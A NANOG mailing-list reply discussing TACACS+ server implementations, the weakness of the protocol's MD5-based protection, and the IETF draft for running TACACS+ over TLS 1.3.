On Wed, Sep 20, 2023 at 10:22 AM, Jim <mysi...@gmail.com> wrote: > On Wed, Sep 20, 2023 at 11:16 AM Mike Lewinski via NANOG <nanog@nanog.org> > wrote: > >> > https://www.shrubbery.net/tac_plus/ >> That tac_plus has python 2 dependencies and so has been removed from >> Debian packages. That's not surprising given the last update was 2015 and >> Python 2 was EOL in 2020: https://www.python.org/doc/sunset-python-2/ > > Currently I favor this one which is still being actively developed: >> https://www.pro-bono-publico.de/projects/tac_plus.html >> > > Yes. Well, on the plus side the TACACS protocol has not really changed > in 30 years, > Even the 2015 code could work provided you can compile its dependencies > from sources, right... > > On the downside, for the command authorization use: > TACACS+ provides little protection for messages between client and server; > > The protocol's MD5 crypto is so weak that routers using TACACS+ for > authentication > might as well just be piping over user credentials in the clear: it's > barely any better. >
Yes, but there is current work in the IETF OpsAWG WG to help address this: https://datatracker.ietf.org/doc/draft-ietf-opsawg-tacacs-tls13/ This work was actually started many years ago, but got sidetracked — there was no published standard for TACACS, and so we first published RFC8907 - "The Terminal Access Controller Access-Control System Plus (TACACS+) Protocol" <https://datatracker.ietf.org/doc/rfc8907/>, and this new document largely says "Now just do that over TLS! kthxbye…" Hopefully this draft will progress soon… W > Router operating systems still typically use only passwords with > SSH, then those devices send the passwords over that insecure channel. I > have yet to > see much in terms of routers capable to Tacacs+ Authorize users based on > users' > openSSH certificate, Public key id, or ed2559-sk security key id, etc. > > In short.. unless you got a VPN or a dedicated secure link from every > single device to > its Tacacs server or an Experimental implementation of TACACS+ over TLS: > I would suggest consider Using tools or scripts to distribute users and > Authorizing configurations to > devices as local authorization through secure protocols as favorable to > those network authentication systems > that transmit sensitive decisions and user data across the network using > Insecure protocols. > > -- > -Jim >